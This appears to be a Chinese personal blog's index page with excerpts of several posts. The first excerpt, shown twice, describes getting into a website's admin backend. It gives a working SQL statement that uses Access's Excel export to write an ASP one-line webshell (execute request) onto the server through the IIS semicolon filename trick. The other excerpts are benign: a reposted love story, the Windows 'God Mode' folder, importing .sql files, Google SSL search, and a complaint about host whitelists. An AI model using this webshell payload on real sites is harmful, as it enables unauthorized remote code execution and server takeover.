今天进了一个网站的后台,发现没有任何可利用的地方,只有一个SQL高级助手,而且有一个站点物理路径,而且这套程序网上是开源的,我知道数据库的表名,于是想到了利用Access导出WebShell,方法如下:
SELECT '<%execute request("z")%>' into [a] in 'c:\z.asp;z.xls' 'excel 8.0;' from a
...今天进了一个网站的后台,发现没有任何可利用的地方,只有一个SQL高级助手,而且有一个站点物理路径,而且这套程序网上是开源的,我知道数据库的表名,于是想到了利用Access导出WebShell,方法如下:
SELECT '<%execute request("z")%>' into [a] in 'c:\z.asp;z.xls' 'excel 8.0;' from a
...今天闯进别人的博客看到一篇文章,很是感动,于是转了过来分享一下吧。
毕业时,女孩子对男孩子说:我要去北京,北京的中关村有中国硅谷之称,那里机遇多,以后容易发达。
男孩子说:那我就回四川老家,那里是天府之国,美女多,以后你发达了不要我,我容易再找。
女孩子的小拳头在男孩子厚实的胸前轻敲,嘟起了小嘴儿,说你就知道想美女,哼,就算以后我不要你了,你也只能想着我爱着我,不许你找别的女孩子。
...
无论是VISTA,还是WIN7,你在桌面上面新建一个文件夹,取名为:小健博客.{ED7BA470-8E54-465E-825C-99712043E01C} 红色部分

如果我们下载了新的PHP+MYSQL 数据库的程序,有的直接安装数据库,比如像DEDECMS,只需要提供服务器IP,数据库名,用户名,密码这四样东西就行了。
但有的情况是,程序不自带安装程序,只有 .sql 数据库文件,又或者是要搬程序到别的服务器上面,那怎么搬呢。本文就教你如何搬到别的服务器的方法也就是怎样导入 .sql 数据库文件的方法。
... 前一段时间谷歌终于推出了SSL加密访问方式,可以保护用户的搜索关键字和搜索结果不被ISP等第三方机构拦截、窃取,不被墙连接重置。
也就是说可以用 https://www.google.com 来访问了 http 后面多了个S ,这就是加密的意思。
当时我自己也试了一下 https://www.google.com 立马就跳到 http://www.google.com.hk 当时还以为我们国内用户不能用呢,直到今天我才知道,原来是可以用的,需要稍稍设置一下。
... 
前两天由于服务器速度慢,就重新换了一新服务器,换上去之后,速度快啊,没想到才一天,小健博客就不能访问了,原因是:这台新服务器新加了白名单,没办法,只好又搬回来,已经打了电话,希望能快点把我的域名加进去,再网上大概看了一下,很多人对白名单很反感,有的服务商甚至从中渔利,实行 网站白名单制度 而且每个域名收20元,如果你的二级域名要绑定,也算一个独立域名,也要收20元,真的想钱想疯了,难怪中国N多小站长全部奔向国外了,由此可想而知,只要中国人有能力,有这个钱,肯定也全部移民国外,就像那些明星们.
...